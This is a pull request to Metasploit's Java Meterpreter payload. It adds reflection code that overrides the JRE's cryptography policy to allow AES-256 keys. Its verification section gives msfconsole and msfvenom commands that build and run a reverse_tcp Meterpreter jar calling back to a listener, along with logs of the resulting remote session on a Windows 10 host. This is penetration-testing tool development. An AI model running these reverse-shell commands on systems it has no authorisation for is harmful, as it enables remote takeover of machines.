### PR TITLE
Fix java key length exception on certain JRE versions

### DIFF
--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_negotiate_tlv_encryption.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_negotiate_tlv_encryption.java
@@ -1,18 +1,19 @@
 package com.metasploit.meterpreter.core;
 
-import javax.xml.bind.DatatypeConverter;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.Modifier;
 import java.security.KeyFactory;
 import java.security.PublicKey;
 import java.security.SecureRandom;
 import java.security.spec.X509EncodedKeySpec;
-import java.lang.String;
+import java.util.Map;
 import javax.crypto.Cipher;
 
 import com.metasploit.meterpreter.Transport;
 import com.metasploit.meterpreter.Meterpreter;
 import com.metasploit.meterpreter.TLVPacket;
 import com.metasploit.meterpreter.TLVType;
-import com.metasploit.meterpreter.Utils;
 import com.metasploit.meterpreter.command.Command;
 
 public class core_negotiate_tlv_encryption implements Command {
@@ -20,6 +21,10 @@ public class core_negotiate_tlv_encryption implements Command {
     private static final SecureRandom sr = new SecureRandom();
 
     public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        if (!fixKeyLength()) {
+            return ERROR_FAILURE;
+        }
+
         byte[] der = request.getRawValue(TLVType.TLV_TYPE_RSA_PUB_KEY);
         byte[] aesKey = new byte[32];
         sr.nextBytes(aesKey);
@@ -40,6 +45,44 @@ public class core_negotiate_tlv_encryption implements Command {
         meterpreter.getTransports().current().setAesEncryptionKey(aesKey);
 
         return ERROR_SUCCESS;
+    }
+
+    private static boolean fixKeyLength() {
+        int newMaxKeyLength;
+        try {
+            if ((newMaxKeyLength = Cipher.getMaxAllowedKeyLength("AES")) < 256) {
+                Class c = Class.forName("javax.crypto.CryptoAllPermissionCollection");
+                Constructor con = c.getDeclaredConstructor();
+                con.setAccessible(true);
+                Object allPermissionCollection = con.newInstance();
+                Field f = c.getDeclaredField("all_allowed");
+                f.setAccessible(true);
+                f.setBoolean(allPermissionCollection, true);
+
+                c = Class.forName("javax.crypto.CryptoPermissions");
+                con = c.getDeclaredConstructor();
+                con.setAccessible(true);
+                Object allPermissions = con.newInstance();
+                f = c.getDeclaredField("perms");
+                f.setAccessible(true);
+                ((Map) f.get(allPermissions)).put("*", allPermissionCollection);
+
+                c = Class.forName("javax.crypto.JceSecurityManager");
+                f = c.getDeclaredField("defaultPolicy");
+                f.setAccessible(true);
+                Field mf = Field.class.getDeclaredField("modifiers");
+                mf.setAccessible(true);
+                mf.setInt(f, f.getModifiers() & ~Modifier.FINAL);
+                f.set(null, allPermissions);
+
+                newMaxKeyLength = Cipher.getMaxAllowedKeyLength("AES");
+            }
+        } catch (Exception e) {
+            return false;
+        }
+        if (newMaxKeyLength < 256)
+            return false;
+        return true;
     }
 
     private PublicKey getPublicKey(byte[] der) {

--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_negotiate_tlv_encryption.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_negotiate_tlv_encryption.java
@@ -47,6 +47,8 @@ public class core_negotiate_tlv_encryption implements Command {
         return ERROR_SUCCESS;
     }
 
+    //https://stackoverflow.com/questions/6481627/java-security-illegal-key-size-or-default-parameters
+    //https://stackoverflow.com/questions/1179672/how-to-avoid-installing-unlimited-strength-jce-policy-files-when-deploying-an
     private static boolean fixKeyLength() {
         int newMaxKeyLength;
         try {


### PR DESCRIPTION
While https://github.com/rapid7/metasploit-payloads/pull/400 works in the majority of cases, some JRE and operating system combinations do not allow a 256 bit key length.
In particular
```
java version "1.8.0_131"
Java(TM) SE Runtime Environment (build 1.8.0_131-b11)
Java HotSpot(TM) 64-Bit Server VM (build 25.131-b11, mixed mode)
```
on Windows 10 (Windows 7 works fine) have this problem. It's unclear whether the locale also causes this issue.

Stack overflow seems to offer some suggestions:
1. Install http://www.oracle.com/technetwork/java/javase/downloads/jce-6-download-429243.html, however we can't get people to install this, and including this jar seems fiddly.
2. Run `Security.setProperty("crypto.policy", "unlimited");` however this didn't fix the issue for me.
3. The abomination you see in the pull request.

Ping @schierlm (thanks so much for your input by the way!)


# Verification
1. `msfconsole -qx "use exploit/multi/handler; set payload java/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set JavaMeterpreterDebug true; set ExitOnSession false; run -j"`
2. `msfvenom -p java/meterpreter/reverse_tcp JavaMeterpreterDebug=true LHOST=$LHOST LPORT=4444 -o meterpreter.jar && java -jar meterpreter.jar`
3. Run `meterpreter > sysinfo` (or any command you like)

# Before
```
[-] Meterpreter session 42 is not valid and will be closed
[*] Sending stage (59355 bytes) to 192.168.56.3
[*] 192.168.56.3 - Meterpreter session 42 closed.
[*] Meterpreter session 43 opened (192.168.56.1:4444 -> 192.168.56.3:49719) at 2020-06-26 18:35:01 +0800
[*] 192.168.56.3 - Meterpreter session 43 closed.  Reason: Died
[-] Meterpreter session 43 is not valid and will be closed

```

# After
```
[*] Sending stage (58977 bytes) to 192.168.56.3
[*] Meterpreter session 45 opened (192.168.56.1:4444 -> 192.168.56.3:49721) at 2020-06-26 19:26:09 +0800

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                      Information             Connection
  --  ----  ----                      -----------             ----------
  45        meterpreter java/windows  User @ DESKTOP  192.168.56.1:4444 -> 192.168.56.3:49721 (192.168.56.3)

msf5 exploit(multi/handler) > sessions 45
[*] Starting interaction with 45...

meterpreter > sysinfo
Computer    : DESKTOP
OS          : Windows 10 10.0 (amd64)
Meterpreter : java/windows
```
